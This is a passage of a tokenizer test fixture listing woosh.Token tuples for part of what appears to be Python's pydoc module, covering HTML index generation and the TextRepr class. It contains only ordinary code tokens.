woosh.Token(woosh.NEWLINE, '\r\n', 1097, 23, 1098, 0),
woosh.Token(woosh.NAME, 'return', 1099, 8, 1099, 14),
woosh.Token(woosh.STRING, "''", 1099, 15, 1099, 17),
woosh.Token(woosh.OP, '.', 1099, 17, 1099, 18),
woosh.Token(woosh.NAME, 'join', 1099, 18, 1099, 22),
woosh.Token(woosh.OP, '(', 1099, 22, 1099, 23),
woosh.Token(woosh.NAME, 'results', 1099, 23, 1099, 30),
woosh.Token(woosh.OP, ')', 1099, 30, 1099, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1099, 31, 1100, 0),
woosh.Token(woosh.DEDENT, ' ', 1101, 0, 1101, 4),
woosh.Token(woosh.NAME, 'docproperty', 1101, 4, 1101, 15),
woosh.Token(woosh.OP, '=', 1101, 16, 1101, 17),
woosh.Token(woosh.NAME, 'docdata', 1101, 18, 1101, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1101, 25, 1102, 0),
woosh.Token(woosh.NAME, 'def', 1103, 4, 1103, 7),
woosh.Token(woosh.NAME, 'docother', 1103, 8, 1103, 16),
woosh.Token(woosh.OP, '(', 1103, 16, 1103, 17),
woosh.Token(woosh.NAME, 'self', 1103, 17, 1103, 21),
woosh.Token(woosh.OP, ',', 1103, 21, 1103, 22),
woosh.Token(woosh.NAME, 'object', 1103, 23, 1103, 29),
woosh.Token(woosh.OP, ',', 1103, 29, 1103, 30),
woosh.Token(woosh.NAME, 'name', 1103, 31, 1103, 35),
woosh.Token(woosh.OP, '=', 1103, 35, 1103, 36),
woosh.Token(woosh.NAME, 'None', 1103, 36, 1103, 40),
woosh.Token(woosh.OP, ',', 1103, 40, 1103, 41),
woosh.Token(woosh.NAME, 'mod', 1103, 42, 1103, 45),
woosh.Token(woosh.OP, '=', 1103, 45, 1103, 46),
woosh.Token(woosh.NAME, 'None', 1103, 46, 1103, 50),
woosh.Token(woosh.OP, ',', 1103, 50, 1103, 51),
woosh.Token(woosh.OP, '*', 1103, 52, 1103, 53),
woosh.Token(woosh.NAME, 'ignored', 1103, 53, 1103, 60),
woosh.Token(woosh.OP, ')', 1103, 60, 1103, 61),
woosh.Token(woosh.OP, ':', 1103, 61, 1103, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1103, 62, 1104, 0),
woosh.Token(woosh.INDENT, ' ', 1104, 0, 1104, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a data object."""', 1104, 8, 1104, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1104, 59, 1105, 0),
woosh.Token(woosh.NAME, 'lhs', 1105, 8, 1105, 11),
woosh.Token(woosh.OP, '=', 1105, 12, 1105, 13),
woosh.Token(woosh.NAME, 'name', 1105, 14, 1105, 18),
woosh.Token(woosh.NAME, 'and', 1105, 19, 1105, 22),
woosh.Token(woosh.STRING, "'<strong>%s</strong> = '", 1105, 23, 1105, 47),
woosh.Token(woosh.OP, '%', 1105, 48, 1105, 49),
woosh.Token(woosh.NAME, 'name', 1105, 50, 1105, 54),
woosh.Token(woosh.NAME, 'or', 1105, 55, 1105, 57),
woosh.Token(woosh.STRING, "''", 1105, 58, 1105, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1105, 60, 1106, 0),
woosh.Token(woosh.NAME, 'return', 1106, 8, 1106, 14),
woosh.Token(woosh.NAME, 'lhs', 1106, 15, 1106, 18),
woosh.Token(woosh.OP, '+', 1106, 19, 1106, 20),
woosh.Token(woosh.NAME, 'self', 1106, 21, 1106, 25),
woosh.Token(woosh.OP, '.', 1106, 25, 1106, 26),
woosh.Token(woosh.NAME, 'repr', 1106, 26, 1106, 30),
woosh.Token(woosh.OP, '(', 1106, 30, 1106, 31),
woosh.Token(woosh.NAME, 'object', 1106, 31, 1106, 37),
woosh.Token(woosh.OP, ')', 1106, 37, 1106, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1106, 38, 1107, 0),
woosh.Token(woosh.DEDENT, ' ', 1108, 0, 1108, 4),
woosh.Token(woosh.NAME, 'def', 1108, 4, 1108, 7),
woosh.Token(woosh.NAME, 'index', 1108, 8, 1108, 13),
woosh.Token(woosh.OP, '(', 1108, 13, 1108, 14),
woosh.Token(woosh.NAME, 'self', 1108, 14, 1108, 18),
woosh.Token(woosh.OP, ',', 1108, 18, 1108, 19),
woosh.Token(woosh.NAME, 'dir', 1108, 20, 1108, 23),
woosh.Token(woosh.OP, ',', 1108, 23, 1108, 24),
woosh.Token(woosh.NAME, 'shadowed', 1108, 25, 1108, 33),
woosh.Token(woosh.OP, '=', 1108, 33, 1108, 34),
woosh.Token(woosh.NAME, 'None', 1108, 34, 1108, 38),
woosh.Token(woosh.OP, ')', 1108, 38, 1108, 39),
woosh.Token(woosh.OP, ':', 1108, 39, 1108, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1108, 40, 1109, 0),
woosh.Token(woosh.INDENT, ' ', 1109, 0, 1109, 8),
woosh.Token(woosh.STRING, '"""Generate an HTML index for a directory of modules."""', 1109, 8, 1109, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1109, 64, 1110, 0),
woosh.Token(woosh.NAME, 'modpkgs', 1110, 8, 1110, 15),
woosh.Token(woosh.OP, '=', 1110, 16, 1110, 17),
woosh.Token(woosh.OP, '[', 1110, 18, 1110, 19),
woosh.Token(woosh.OP, ']', 1110, 19, 1110, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1110, 20, 1111, 0),
woosh.Token(woosh.NAME, 'if', 1111, 8, 1111, 10),
woosh.Token(woosh.NAME, 'shadowed', 1111, 11, 1111, 19),
woosh.Token(woosh.NAME, 'is', 1111, 20, 1111, 22),
woosh.Token(woosh.NAME, 'None', 1111, 23, 1111, 27),
woosh.Token(woosh.OP, ':', 1111, 27, 1111, 28),
woosh.Token(woosh.NAME, 'shadowed', 1111, 29, 1111, 37),
woosh.Token(woosh.OP, '=', 1111, 38, 1111, 39),
woosh.Token(woosh.OP, '{', 1111, 40, 1111, 41),
woosh.Token(woosh.OP, '}', 1111, 41, 1111, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1111, 42, 1112, 0),
woosh.Token(woosh.NAME, 'for', 1112, 8, 1112, 11),
woosh.Token(woosh.NAME, 'importer', 1112, 12, 1112, 20),
woosh.Token(woosh.OP, ',', 1112, 20, 1112, 21),
woosh.Token(woosh.NAME, 'name', 1112, 22, 1112, 26),
woosh.Token(woosh.OP, ',', 1112, 26, 1112, 27),
woosh.Token(woosh.NAME, 'ispkg', 1112, 28, 1112, 33),
woosh.Token(woosh.NAME, 'in', 1112, 34, 1112, 36),
woosh.Token(woosh.NAME, 'pkgutil', 1112, 37, 1112, 44),
woosh.Token(woosh.OP, '.', 1112, 44, 1112, 45),
woosh.Token(woosh.NAME, 'iter_modules', 1112, 45, 1112, 57),
woosh.Token(woosh.OP, '(', 1112, 57, 1112, 58),
woosh.Token(woosh.OP, '[', 1112, 58, 1112, 59),
woosh.Token(woosh.NAME, 'dir', 1112, 59, 1112, 62),
woosh.Token(woosh.OP, ']', 1112, 62, 1112, 63),
woosh.Token(woosh.OP, ')', 1112, 63, 1112, 64),
woosh.Token(woosh.OP, ':', 1112, 64, 1112, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1112, 65, 1113, 0),
woosh.Token(woosh.INDENT, ' ', 1113, 0, 1113, 12),
woosh.Token(woosh.NAME, 'if', 1113, 12, 1113, 14),
woosh.Token(woosh.NAME, 'any', 1113, 15, 1113, 18),
woosh.Token(woosh.OP, '(', 1113, 18, 1113, 19),
woosh.Token(woosh.OP, '(', 1113, 19, 1113, 20),
woosh.Token(woosh.NUMBER, '0xD800', 1113, 20, 1113, 26),
woosh.Token(woosh.OP, '<=', 1113, 27, 1113, 29),
woosh.Token(woosh.NAME, 'ord', 1113, 30, 1113, 33),
woosh.Token(woosh.OP, '(', 1113, 33, 1113, 34),
woosh.Token(woosh.NAME, 'ch', 1113, 34, 1113, 36),
woosh.Token(woosh.OP, ')', 1113, 36, 1113, 37),
woosh.Token(woosh.OP, '<=', 1113, 38, 1113, 40),
woosh.Token(woosh.NUMBER, '0xDFFF', 1113, 41, 1113, 47),
woosh.Token(woosh.OP, ')', 1113, 47, 1113, 48),
woosh.Token(woosh.NAME, 'for', 1113, 49, 1113, 52),
woosh.Token(woosh.NAME, 'ch', 1113, 53, 1113, 55),
woosh.Token(woosh.NAME, 'in', 1113, 56, 1113, 58),
woosh.Token(woosh.NAME, 'name', 1113, 59, 1113, 63),
woosh.Token(woosh.OP, ')', 1113, 63, 1113, 64),
woosh.Token(woosh.OP, ':', 1113, 64, 1113, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1113, 65, 1114, 0),
woosh.Token(woosh.COMMENT, '# ignore a module if its name contains a surrogate character', 1114, 16, 1114, 76),
woosh.Token(woosh.INDENT, ' ', 1115, 0, 1115, 16),
woosh.Token(woosh.NAME, 'continue', 1115, 16, 1115, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1115, 24, 1116, 0),
woosh.Token(woosh.DEDENT, ' ', 1116, 0, 1116, 12),
woosh.Token(woosh.NAME, 'modpkgs', 1116, 12, 1116, 19),
woosh.Token(woosh.OP, '.', 1116, 19, 1116, 20),
woosh.Token(woosh.NAME, 'append', 1116, 20, 1116, 26),
woosh.Token(woosh.OP, '(', 1116, 26, 1116, 27),
woosh.Token(woosh.OP, '(', 1116, 27, 1116, 28),
woosh.Token(woosh.NAME, 'name', 1116, 28, 1116, 32),
woosh.Token(woosh.OP, ',', 1116, 32, 1116, 33),
woosh.Token(woosh.STRING, "''", 1116, 34, 1116, 36),
woosh.Token(woosh.OP, ',', 1116, 36, 1116, 37),
woosh.Token(woosh.NAME, 'ispkg', 1116, 38, 1116, 43),
woosh.Token(woosh.OP, ',', 1116, 43, 1116, 44),
woosh.Token(woosh.NAME, 'name', 1116, 45, 1116, 49),
woosh.Token(woosh.NAME, 'in', 1116, 50, 1116, 52),
woosh.Token(woosh.NAME, 'shadowed', 1116, 53, 1116, 61),
woosh.Token(woosh.OP, ')', 1116, 61, 1116, 62),
woosh.Token(woosh.OP, ')', 1116, 62, 1116, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1116, 63, 1117, 0),
woosh.Token(woosh.NAME, 'shadowed', 1117, 12, 1117, 20),
woosh.Token(woosh.OP, '[', 1117, 20, 1117, 21),
woosh.Token(woosh.NAME, 'name', 1117, 21, 1117, 25),
woosh.Token(woosh.OP, ']', 1117, 25, 1117, 26),
woosh.Token(woosh.OP, '=', 1117, 27, 1117, 28),
woosh.Token(woosh.NUMBER, '1', 1117, 29, 1117, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1117, 30, 1118, 0),
woosh.Token(woosh.DEDENT, ' ', 1119, 0, 1119, 8),
woosh.Token(woosh.NAME, 'modpkgs', 1119, 8, 1119, 15),
woosh.Token(woosh.OP, '.', 1119, 15, 1119, 16),
woosh.Token(woosh.NAME, 'sort', 1119, 16, 1119, 20),
woosh.Token(woosh.OP, '(', 1119, 20, 1119, 21),
woosh.Token(woosh.OP, ')', 1119, 21, 1119, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1119, 22, 1120, 0),
woosh.Token(woosh.NAME, 'contents', 1120, 8, 1120, 16),
woosh.Token(woosh.OP, '=', 1120, 17, 1120, 18),
woosh.Token(woosh.NAME, 'self', 1120, 19, 1120, 23),
woosh.Token(woosh.OP, '.', 1120, 23, 1120, 24),
woosh.Token(woosh.NAME, 'multicolumn', 1120, 24, 1120, 35),
woosh.Token(woosh.OP, '(', 1120, 35, 1120, 36),
woosh.Token(woosh.NAME, 'modpkgs', 1120, 36, 1120, 43),
woosh.Token(woosh.OP, ',', 1120, 43, 1120, 44),
woosh.Token(woosh.NAME, 'self', 1120, 45, 1120, 49),
woosh.Token(woosh.OP, '.', 1120, 49, 1120, 50),
woosh.Token(woosh.NAME, 'modpkglink', 1120, 50, 1120, 60),
woosh.Token(woosh.OP, ')', 1120, 60, 1120, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1120, 61, 1121, 0),
woosh.Token(woosh.NAME, 'return', 1121, 8, 1121, 14),
woosh.Token(woosh.NAME, 'self', 1121, 15, 1121, 19),
woosh.Token(woosh.OP, '.', 1121, 19, 1121, 20),
woosh.Token(woosh.NAME, 'bigsection', 1121, 20, 1121, 30),
woosh.Token(woosh.OP, '(', 1121, 30, 1121, 31),
woosh.Token(woosh.NAME, 'dir', 1121, 31, 1121, 34),
woosh.Token(woosh.OP, ',', 1121, 34, 1121, 35),
woosh.Token(woosh.STRING, "'#ffffff'", 1121, 36, 1121, 45),
woosh.Token(woosh.OP, ',', 1121, 45, 1121, 46),
woosh.Token(woosh.STRING, "'#ee77aa'", 1121, 47, 1121, 56),
woosh.Token(woosh.OP, ',', 1121, 56, 1121, 57),
woosh.Token(woosh.NAME, 'contents', 1121, 58, 1121, 66),
woosh.Token(woosh.OP, ')', 1121, 66, 1121, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1121, 67, 1122, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------- text documentation generator', 1123, 0, 1123, 75),
woosh.Token(woosh.DEDENT, '', 1125, 0, 1125, 0),
woosh.Token(woosh.DEDENT, '', 1125, 0, 1125, 0),
woosh.Token(woosh.NAME, 'class', 1125, 0, 1125, 5),
woosh.Token(woosh.NAME, 'TextRepr', 1125, 6, 1125, 14),
woosh.Token(woosh.OP, '(', 1125, 14, 1125, 15),
woosh.Token(woosh.NAME, 'Repr', 1125, 15, 1125, 19),
woosh.Token(woosh.OP, ')', 1125, 19, 1125, 20),
woosh.Token(woosh.OP, ':', 1125, 20, 1125, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1125, 21, 1126, 0),
woosh.Token(woosh.INDENT, ' ', 1126, 0, 1126, 4),
woosh.Token(woosh.STRING, '"""Class for safely making a text representation of a Python object."""', 1126, 4, 1126, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1126, 75, 1127, 0),
woosh.Token(woosh.NAME, 'def', 1127, 4, 1127, 7),
woosh.Token(woosh.NAME, '__init__', 1127, 8, 1127, 16),
woosh.Token(woosh.OP, '(', 1127, 16, 1127, 17),
woosh.Token(woosh.NAME, 'self', 1127, 17, 1127, 21),
woosh.Token(woosh.OP, ')', 1127, 21, 1127, 22),
woosh.Token(woosh.OP, ':', 1127, 22, 1127, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1127, 23, 1128, 0),
woosh.Token(woosh.INDENT, ' ', 1128, 0, 1128, 8),
woosh.Token(woosh.NAME, 'Repr', 1128, 8, 1128, 12),
woosh.Token(woosh.OP, '.', 1128, 12, 1128, 13),
woosh.Token(woosh.NAME, '__init__', 1128, 13, 1128, 21),
woosh.Token(woosh.OP, '(', 1128, 21, 1128, 22),
woosh.Token(woosh.NAME, 'self', 1128, 22, 1128, 26),
woosh.Token(woosh.OP, ')', 1128, 26, 1128, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1128, 27, 1129, 0),
woosh.Token(woosh.NAME, 'self', 1129, 8, 1129, 12),
woosh.Token(woosh.OP, '.', 1129, 12, 1129, 13),
woosh.Token(woosh.NAME, 'maxlist', 1129, 13, 1129, 20),
woosh.Token(woosh.OP, '=', 1129, 21, 1129, 22),
woosh.Token(woosh.NAME, 'self', 1129, 23, 1129, 27),
woosh.Token(woosh.OP, '.', 1129, 27, 1129, 28),
woosh.Token(woosh.NAME, 'maxtuple', 1129, 28, 1129, 36),
woosh.Token(woosh.OP, '=', 1129, 37, 1129, 38),
woosh.Token(woosh.NUMBER, '20', 1129, 39, 1129, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1129, 41, 1130, 0),
woosh.Token(woosh.NAME, 'self', 1130, 8, 1130, 12),
woosh.Token(woosh.OP, '.', 1130, 12, 1130, 13),
woosh.Token(woosh.NAME, 'maxdict', 1130, 13, 1130, 20),
woosh.Token(woosh.OP, '=', 1130, 21, 1130, 22),
woosh.Token(woosh.NUMBER, '10', 1130, 23, 1130, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1130, 25, 1131, 0),
woosh.Token(woosh.NAME, 'self', 1131, 8, 1131, 12),
woosh.Token(woosh.OP, '.', 1131, 12, 1131, 13),
woosh.Token(woosh.NAME, 'maxstring', 1131, 13, 1131, 22),
woosh.Token(woosh.OP, '=', 1131, 23, 1131, 24),
woosh.Token(woosh.NAME, 'self', 1131, 25, 1131, 29),
woosh.Token(woosh.OP, '.', 1131, 29, 1131, 30),
woosh.Token(woosh.NAME, 'maxother', 1131, 30, 1131, 38),
woosh.Token(woosh.OP, '=', 1131, 39, 1131, 40),
woosh.Token(woosh.NUMBER, '100', 1131, 41, 1131, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1131, 44, 1132, 0),
woosh.Token(woosh.DEDENT, ' ', 1133, 0, 1133, 4),
woosh.Token(woosh.NAME, 'def', 1133, 4, 1133, 7),
woosh.Token(woosh.NAME, 'repr1', 1133, 8, 1133, 13),
woosh.Token(woosh.OP, '(', 1133, 13, 1133, 14),
woosh.Token(woosh.NAME, 'self', 1133, 14, 1133, 18),
woosh.Token(woosh.OP, ',', 1133, 18, 1133, 19),
woosh.Token(woosh.NAME, 'x', 1133, 20, 1133, 21),
woosh.Token(woosh.OP, ',', 1133, 21, 1133, 22),
woosh.Token(woosh.NAME, 'level', 1133, 23, 1133, 28),
woosh.Token(woosh.OP, ')', 1133, 28, 1133, 29),
woosh.Token(woosh.OP, ':', 1133, 29, 1133, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1133, 30, 1134, 0),
woosh.Token(woosh.INDENT, ' ', 1134, 0, 1134, 8),
woosh.Token(woosh.NAME, 'if', 1134, 8, 1134, 10),
woosh.Token(woosh.NAME, 'hasattr', 1134, 11, 1134, 18),
woosh.Token(woosh.OP, '(', 1134, 18, 1134, 19),
woosh.Token(woosh.NAME, 'type', 1134, 19, 1134, 23),
woosh.Token(woosh.OP, '(', 1134, 23, 1134, 24),
woosh.Token(woosh.NAME, 'x', 1134, 24, 1134, 25),
woosh.Token(woosh.OP, ')', 1134, 25, 1134, 26),
woosh.Token(woosh.OP, ',', 1134, 26, 1134, 27),
woosh.Token(woosh.STRING, "'__name__'", 1134, 28, 1134, 38),
woosh.Token(woosh.OP, ')', 1134, 38, 1134, 39),
woosh.Token(woosh.OP, ':', 1134, 39, 1134, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1134, 40, 1135, 0),
woosh.Token(woosh.INDENT, ' ', 1135, 0, 1135, 12),
woosh.Token(woosh.NAME, 'methodname', 1135, 12, 1135, 22),
woosh.Token(woosh.OP, '=', 1135, 23, 1135, 24),
woosh.Token(woosh.STRING, "'repr_'", 1135, 25, 1135, 32),
woosh.Token(woosh.OP, '+', 1135, 33, 1135, 34),
woosh.Token(woosh.STRING, "'_'", 1135, 35, 1135, 38),
woosh.Token(woosh.OP, '.', 1135, 38, 1135, 39),
woosh.Token(woosh.NAME, 'join', 1135, 39, 1135, 43),
woosh.Token(woosh.OP, '(', 1135, 43, 1135, 44),
woosh.Token(woosh.NAME, 'type', 1135, 44, 1135, 48),
woosh.Token(woosh.OP, '(', 1135, 48, 1135, 49),
woosh.Token(woosh.NAME, 'x', 1135, 49, 1135, 50),
woosh.Token(woosh.OP, ')', 1135, 50, 1135, 51),
woosh.Token(woosh.OP, '.', 1135, 51, 1135, 52),
woosh.Token(woosh.NAME, '__name__', 1135, 52, 1135, 60),
woosh.Token(woosh.OP, '.', 1135, 60, 1135, 61),
woosh.Token(woosh.NAME, 'split', 1135, 61, 1135, 66),
woosh.Token(woosh.OP, '(', 1135, 66, 1135, 67),
woosh.Token(woosh.OP, ')', 1135, 67, 1135, 68),
woosh.Token(woosh.OP, ')', 1135, 68, 1135, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1135, 69, 1136, 0),
woosh.Token(woosh.NAME, 'if', 1136, 12, 1136, 14),
woosh.Token(woosh.NAME, 'hasattr', 1136, 15, 1136, 22),
woosh.Token(woosh.OP, '(', 1136, 22, 1136, 23),
woosh.Token(woosh.NAME, 'self', 1136, 23, 1136, 27),
woosh.Token(woosh.OP, ',', 1136, 27, 1136, 28),
woosh.Token(woosh.NAME, 'methodname', 1136, 29, 1136, 39),
woosh.Token(woosh.OP, ')', 1136, 39, 1136, 40),
woosh.Token(woosh.OP, ':', 1136, 40, 1136, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1136, 41, 1137, 0),
woosh.Token(woosh.INDENT, ' ', 1137, 0, 1137, 16),
woosh.Token(woosh.NAME, 'return', 1137, 16, 1137, 22),
woosh.Token(woosh.NAME, 'getattr', 1137, 23, 1137, 30),
woosh.Token(woosh.OP, '(', 1137, 30, 1137, 31),
woosh.Token(woosh.NAME, 'self', 1137, 31, 1137, 35),
woosh.Token(woosh.OP, ',', 1137, 35, 1137, 36),
woosh.Token(woosh.NAME, 'methodname', 1137, 37, 1137, 47),
woosh.Token(woosh.OP, ')', 1137, 47, 1137, 48),
woosh.Token(woosh.OP, '(', 1137, 48, 1137, 49),
woosh.Token(woosh.NAME, 'x', 1137, 49, 1137, 50),
woosh.Token(woosh.OP, ',', 1137, 50, 1137, 51),
woosh.Token(woosh.NAME, 'level', 1137, 52, 1137, 57),
woosh.Token(woosh.OP, ')', 1137, 57, 1137, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 1137, 58, 1138, 0),
woosh.Token(woosh.DEDENT, ' ', 1138, 0, 1138, 8),
woosh.Token(woosh.DEDENT, '', 1138, 8, 1138, 8),
woosh.Token(woosh.NAME, 'return', 1138, 8, 1138, 14),
woosh.Token(woosh.NAME, 'cram', 1138, 15, 1138, 19),
woosh.Token(woosh.OP, '(', 1138, 19, 1138, 20),
woosh.Token(woosh.NAME, 'stripid', 1138, 20, 1138, 27),
woosh.Token(woosh.OP, '(', 1138, 27, 1138, 28),
woosh.Token(woosh.NAME, 'repr', 1138, 28, 1138, 32),
woosh.Token(woosh.OP, '(', 1138, 32, 1138, 33),
woosh.Token(woosh.NAME, 'x', 1138, 33, 1138, 34),
woosh.Token(woosh.OP, ')', 1138, 34, 1138, 35),
woosh.Token(woosh.OP, ')', 1138, 35, 1138, 36),
woosh.Token(woosh.OP, ',', 1138, 36, 1138, 37),
woosh.Token(woosh.NAME, 'self', 1138, 38, 1138, 42),
woosh.Token(woosh.OP, '.', 1138, 42, 1138, 43),
woosh.Token(woosh.NAME, 'maxother', 1138, 43, 1138, 51),
woosh.Token(woosh.OP, ')', 1138, 51, 1138, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1138, 52, 1139, 0),
woosh.Token(woosh.DEDENT, ' ', 1140, 0, 1140, 4),
woosh.Token(woosh.NAME, 'def', 1140, 4, 1140, 7),
woosh.Token(woosh.NAME, 'repr_string', 1140, 8, 1140, 19),
woosh.Token(woosh.OP, '(', 1140, 19, 1140, 20),
woosh.Token(woosh.NAME, 'self', 1140, 20, 1140, 24),
woosh.Token(woosh.OP, ',', 1140, 24, 1140, 25),
woosh.Token(woosh.NAME, 'x', 1140, 26, 1140, 27),
woosh.Token(woosh.OP, ',', 1140, 27, 1140, 28),
woosh.Token(woosh.NAME, 'level', 1140, 29, 1140, 34),
woosh.Token(woosh.OP, ')', 1140, 34, 1140, 35),
woosh.Token(woosh.OP, ':', 1140, 35, 1140, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1140, 36, 1141, 0),
woosh.Token(woosh.INDENT, ' ', 1141, 0, 1141, 8),
woosh.Token(woosh.NAME, 'test', 1141, 8, 1141, 12),
woosh.Token(woosh.OP, '=', 1141, 13, 1141, 14),
woosh.Token(woosh.NAME, 'cram', 1141, 15, 1141, 19),
woosh.Token(woosh.OP, '(', 1141, 19, 1141, 20),
woosh.Token(woosh.NAME, 'x', 1141, 20, 1141, 21),
woosh.Token(woosh.OP, ',', 1141, 21, 1141, 22),
woosh.Token(woosh.NAME, 'self', 1141, 23, 1141, 27),
woosh.Token(woosh.OP, '.', 1141, 27, 1141, 28),
woosh.Token(woosh.NAME, 'maxstring', 1141, 28, 1141, 37),
woosh.Token(woosh.OP, ')', 1141, 37, 1141, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1141, 38, 1142, 0),
woosh.Token(woosh.NAME, 'testrepr', 1142, 8, 1142, 16),
woosh.Token(woosh.OP, '=', 1142, 17, 1142, 18),
woosh.Token(woosh.NAME, 'repr', 1142, 19, 1142, 23),
woosh.Token(woosh.OP, '(', 1142, 23, 1142, 24),
woosh.Token(woosh.NAME, 'test', 1142, 24, 1142, 28),
woosh.Token(woosh.OP, ')', 1142, 28, 1142, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1142, 29, 1143, 0),
woosh.Token(woosh.NAME, 'if', 1143, 8, 1143, 10),
woosh.Token(woosh.STRING, "'\\\\'", 1143, 11, 1143, 15),
woosh.Token(woosh.NAME, 'in', 1143, 16, 1143, 18),
woosh.Token(woosh.NAME, 'test', 1143, 19, 1143, 23),
woosh.Token(woosh.NAME, 'and', 1143, 24, 1143, 27),
woosh.Token(woosh.STRING, "'\\\\'", 1143, 28, 1143, 32),
woosh.Token(woosh.NAME, 'not', 1143, 33, 1143, 36),
woosh.Token(woosh.NAME, 'in', 1143, 37, 1143, 39),
woosh.Token(woosh.NAME, 'replace', 1143, 40, 1143, 47),
woosh.Token(woosh.OP, '(', 1143, 47, 1143, 48),
woosh.Token(woosh.NAME, 'testrepr', 1143, 48, 1143, 56),
woosh.Token(woosh.OP, ',', 1143, 56, 1143, 57),
woosh.Token(woosh.STRING, "r'\\\\'", 1143, 58, 1143, 63),
woosh.Token(woosh.OP, ',', 1143, 63, 1143, 64),
woosh.Token(woosh.STRING, "''", 1143, 65, 1143, 67),
woosh.Token(woosh.OP, ')', 1143, 67, 1143, 68),
woosh.Token(woosh.OP, ':', 1143, 68, 1143, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1143, 69, 1144, 0),
woosh.Token(woosh.COMMENT, '# Backslashes are only literal in the string and are never', 1144, 12, 1144, 70),
woosh.Token(woosh.COMMENT, '# needed to make any special characters, so show a raw string.', 1145, 12, 1145, 74),
woosh.Token(woosh.INDENT, ' ', 1146, 0, 1146, 12),
woosh.Token(woosh.NAME, 'return', 1146, 12, 1146, 18),
woosh.Token(woosh.STRING, "'r'", 1146, 19, 1146, 22),
woosh.Token(woosh.OP, '+', 1146, 23, 1146, 24),
woosh.Token(woosh.NAME, 'testrepr', 1146, 25, 1146, 33),
woosh.Token(woosh.OP, '[', 1146, 33, 1146, 34),
woosh.Token(woosh.NUMBER, '0', 1146, 34, 1146, 35),
woosh.Token(woosh.OP, ']', 1146, 35, 1146, 36),
woosh.Token(woosh.OP, '+', 1146, 37, 1146, 38),
woosh.Token(woosh.NAME, 'test', 1146, 39, 1146, 43),
woosh.Token(woosh.OP, '+', 1146, 44, 1146, 45),
woosh.Token(woosh.NAME, 'testrepr', 1146, 46, 1146, 54),
woosh.Token(woosh.OP, '[', 1146, 54, 1146, 55),
woosh.Token(woosh.NUMBER, '0', 1146, 55, 1146, 56),
woosh.Token(woosh.OP, ']', 1146, 56, 1146, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1146, 57, 1147, 0),
woosh.Token(woosh.DEDENT, ' ', 1147, 0, 1147, 8),
woosh.Token(woosh.NAME, 'return', 1147, 8, 1147, 14),
woosh.Token(woosh.NAME, 'testrepr', 1147, 15, 1147, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1147, 23, 1148, 0),
woosh.Token(woosh.DEDENT, ' ', 1149, 0, 1149, 4),
woosh.Token(woosh.NAME, 'repr_str', 1149, 4, 1149, 12),
woosh.Token(woosh.OP, '=', 1149, 13, 1149, 14),
woosh.Token(woosh.NAME, 'repr_string', 1149, 15, 1149, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1149, 26, 1150, 0),
woosh.Token(woosh.NAME, 'def', 1151, 4, 1151, 7),
woosh.Token(woosh.NAME, 'repr_instance', 1151, 8, 1151, 21),
woosh.Token(woosh.OP, '(', 1151, 21, 1151, 22),
woosh.Token(woosh.NAME, 'self', 1151, 22, 1151, 26),
woosh.Token(woosh.OP, ',', 1151, 26, 1151, 27),
woosh.Token(woosh.NAME, 'x', 1151, 28, 1151, 29),
woosh.Token(woosh.OP, ',', 1151, 29, 1151, 30),
woosh.Token(woosh.NAME, 'level', 1151, 31, 1151, 36),
woosh.Token(woosh.OP, ')', 1151, 36, 1151, 37),
woosh.Token(woosh.OP, ':', 1151, 37, 1151, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1151, 38, 1152, 0),
woosh.Token(woosh.INDENT, ' ', 1152, 0, 1152, 8),
woosh.Token(woosh.NAME, 'try', 1152, 8, 1152, 11),
woosh.Token(woosh.OP, ':', 1152, 11, 1152, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1152, 12, 1153, 0),
woosh.Token(woosh.INDENT, ' ', 1153, 0, 1153, 12),
woosh.Token(woosh.NAME, 'return', 1153, 12, 1153, 18),
woosh.Token(woosh.NAME, 'cram', 1153, 19, 1153, 23),
woosh.Token(woosh.OP, '(', 1153, 23, 1153, 24),
woosh.Token(woosh.NAME, 'stripid', 1153, 24, 1153, 31),
woosh.Token(woosh.OP, '(', 1153, 31, 1153, 32),
woosh.Token(woosh.NAME, 'repr', 1153, 32, 1153, 36),
woosh.Token(woosh.OP, '(', 1153, 36, 1153, 37),
woosh.Token(woosh.NAME, 'x', 1153, 37, 1153, 38),
woosh.Token(woosh.OP, ')', 1153, 38, 1153, 39),
woosh.Token(woosh.OP, ')', 1153, 39, 1153, 40),
woosh.Token(woosh.OP, ',', 1153, 40, 1153, 41),
